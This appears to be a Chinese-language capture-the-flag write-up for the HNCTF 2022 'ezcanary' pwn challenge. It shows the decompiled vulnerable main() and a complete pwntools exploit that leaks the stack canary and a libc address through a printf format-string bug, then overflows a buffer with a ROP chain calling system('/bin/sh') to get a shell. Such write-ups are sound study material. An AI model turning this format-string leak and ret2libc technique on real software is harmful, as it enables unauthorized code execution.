pwn7(利用格式化字符串泄露libc)

题目[HNCTF 2022 WEEK4]ezcanary

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[96]; // [rsp+0h] [rbp-170h] BYREF
  char buf[264]; // [rsp+60h] [rbp-110h] BYREF
  unsigned __int64 v6; // [rsp+168h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  setbuf(stdout, 0LL);
  puts("Input your name:");
  memset(s, 0, sizeof(s));
  read(0, s, 0x60uLL);
  printf(s);
  read(0, buf, 0x200uLL);
  return 0;
}

格式化字符串漏洞的考察

pwn7(利用格式化字符串泄露libc)_第1张图片

pwn7(利用格式化字符串泄露libc)_第2张图片

手动计算偏移,偏移量为%51$p时是canary,为%53$p时就可以计算出libc。

exp:

from pwn import *
z=process('./l')
context(arch="amd64",os="linux",log_level="debug")
libc=ELF('./libc.so.6')
def bug():
    gdb.attach(z)

z.recvuntil("e:\n")
z.send(b'%51$p.%53$p')
can=int(z.recv(18),16)

print(hex(can))
z.recvuntil('.')

z.recvuntil(b'0x')
libc_base=int(z.recv(18),16)-0x29d90
bug()

print(hex(libc_base))

system = libc_base + libc.sym['system']+0x10
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))+0x10
rdi = 0x401323
ret = 0x40101A
print(hex(system))
print(hex(binsh))
Payload = b'a'*(0x110-8) + p64(can)  + p64(ret) + p64(rdi) + p64(binsh)  + p64(system)
z.send(Payload)

z.interactive()

你可能感兴趣的:(网络安全,算法,linux,服务器,数据库)